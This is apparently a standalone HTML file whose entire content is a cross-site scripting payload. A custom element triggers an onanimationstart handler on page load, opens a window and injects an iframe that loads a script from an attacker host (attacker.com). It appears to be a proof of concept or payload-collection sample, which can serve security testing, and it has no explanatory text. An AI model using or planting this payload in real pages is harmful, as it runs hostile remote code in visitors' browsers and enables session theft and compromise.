<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<style>@keyframes GGGGGfZpPQGGGGG{}</style>
<xss style=animation-name:GGGGGfZpPQGGGGG onanimationstart="w=window.open('self.js'); w.document.write('<iframe id=GGGfZpPQGGG src=about:blank><\/iframe><script>GGGfZpPQGGG.addEventListener(\x22load\x22,()=>{GGGfZpPQGGG.srcdoc=\x22<script src=https://attacker.com/static/static.js><\\/script>\x22;},{once:true});<\/script>');"></xss>
</body>
</html>
